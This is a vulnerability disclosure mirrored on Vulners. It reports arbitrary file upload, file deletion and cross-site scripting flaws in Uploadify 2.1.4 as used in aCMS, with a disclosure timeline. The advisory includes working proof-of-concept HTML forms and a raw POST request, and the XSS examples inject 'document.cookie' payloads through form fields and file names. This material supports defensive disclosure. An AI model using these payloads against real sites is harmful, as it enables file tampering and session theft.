Vulners
Lucene search
Uploadify 2.1.4 File Upload / XSS / File Deletion
`Hello list!
These are Arbitrary File Uploading, Arbitrary File Deletion and Cross-Site
Scripting vulnerabilities in Uploadify. Particularly in the version used in
aCMS (it looks like these developers use modified version of Uploadify, but
other developers also can use such version).
-------------------------
Affected products:
-------------------------
Vulnerable are Uploadify v2.1.4 and potentially other versions. Particularly
version in aCMS. Versions Uploadify 3.x are not vulnerable.
----------
Details:
----------
Arbitrary File Uploading (WASC-31):
http://websecurity.com.ua/uploads/2013/Uploadify%20AFU.html
<body>
<form action="http://site/uploadify.php" method="post"
enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/uploadify/">
<input type="submit" value="OK">
</form>
</body>
Arbitrary File Deletion (WASC-42):
http://websecurity.com.ua/uploads/2013/Uploadify%20AFD.html
<body>
<form action="http://site/uploadify.php" method="post"
enctype="multipart/form-data">
<input type="file" name="test">
<input type="hidden" name="newfile" value="/full/path/uploadify/1">
<input type="submit" value="OK">
</form>
</body>
Cross-Site Scripting (WASC-08):
http://websecurity.com.ua/uploads/2013/Uploadify%20XSS.html
<body>
<form action="http://site/uploadify.php" method="post"
enctype="multipart/form-data">
<input type="file" name="test">
<input type="hidden" name="newfile" value="<body
onload=alert(document.cookie)>">
<input type="submit" value="OK">
</form>
</body>
http://websecurity.com.ua/uploads/2013/Uploadify%20XSS-2.html
<body>
<form action="http://site/uploadify.php" method="post"
enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/uploadify">
<input type="submit" value="OK">
</form>
</body>
The second attack can be done on Linux/Unix systems, where angle brackets
can be used, or with spoofing headers.
With the next headers (to specify XSS payload in extension):
POST http://site/uploadify.php
-----------------------------240841995418756\r\n
Content-Disposition: form-data; name="Filedata"; filename="test.<body
onload=with(document)alert(cookie)>"\r\n
Content-Type: application/octet-stream\r\n
\r\n
test\r\n
\r\n
-----------------------------240841995418756\r\n
Content-Disposition: form-data; name="folder"\r\n
\r\n
/uploadify\r\n
-----------------------------240841995418756--\r\n
------------
Timeline:
------------
2013.03.04 - informed developers of aCMS about part of the vulnerabilities.
2013.04.03 - informed developers of aCMS about another part of the
vulnerabilities.
2013.04.07 - informed developers of aCMS about another part of the
vulnerabilities.
2013.05.25 - informed developers of aCMS about another part of the
vulnerabilities.
2013.05.26 - informed developers of aCMS about another part of the
vulnerabilities.
In all cases the developers just ignored all messages via different e-mails
and contact form.
2013.06.12 - announced at my site.
2013.06.22 - informed developers of Uploadify.
2013.09.12 - disclosed at my site (http://websecurity.com.ua/6566/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Sep 2013 00:00Current
7.4High risk
Vulners AI Score7.4